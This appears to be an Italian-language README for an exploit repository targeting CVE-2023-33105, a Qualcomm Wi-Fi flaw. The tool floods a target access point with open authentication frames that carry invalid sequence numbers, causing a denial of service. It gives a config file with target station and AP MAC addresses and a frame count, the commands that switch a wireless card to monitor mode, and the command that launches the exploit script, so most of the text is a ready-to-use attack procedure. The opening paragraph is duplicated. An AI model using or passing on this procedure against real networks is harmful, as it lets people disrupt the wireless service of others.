
Questo repository contiene il codice exploit per CVE-2023-33105, una vulnerabilità identificata nei dispositivi Qualcomm. L'exploit sfrutta i frame di autenticazione per eseguire un attacco denial of service (DoS) su un access point (AP) di destinazione inviando un gran numero di frame di autenticazione aperti con un numero di sequenza di transazione non valido.
Questa repository contiene il codice di exploit per CVE-2023-33105, una vulnerabilità identificata nei dispositivi Qualcomm. L'exploit sfrutta i frame di autenticazione per eseguire un attacco denial of service (DoS) su un access point (AP) target inviando un gran numero di frame di autenticazione aperti con un numero di sequenza di transazione non valido.
Per installare le librerie Python necessarie, esegui:
pip install -r requirements.txt
config.pyexploit_v2.py: Script principale dell'exploit.Prima di eseguire l'exploit, aggiorna il file config.py con gli indirizzi MAC target e altri parametri.
# config.py
# MAC address of the station (client)
sta_target = 'XX:XX:XX:XX:XX:XX' # change this
# MAC address of the access point (AP)
ap_target = 'YY:YY:YY:YY:YY:YY' # change this
# Number of frames to send
spray = 500
# Interval for checking if the BSSID is still up (in seconds)
check_interval = 60
Per eseguire l'exploit, segui questi passaggi:
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
python exploit_v2.py
Lo script invierà un gran numero di frame di autenticazione aperti con numeri di sequenza di transazione non validi all'AP target, causando un DoS transitorio.
CVE-2023-33105 è una vulnerabilità nei dispositivi Qualcomm che consente un DoS transitorio nel WLAN Host e Firmware quando viene inviato un gran numero di frame di autenticazione aperti con un numero di sequenza di transazione non valido.
Sono necessari Python 3.x, Scapy, Airodump-ng e una scheda di rete wireless in grado di effettuare l'iniezione.
L'uso non autorizzato di questo script contro reti senza permesso è illegale. Questo codice è fornito esclusivamente a scopo educativo.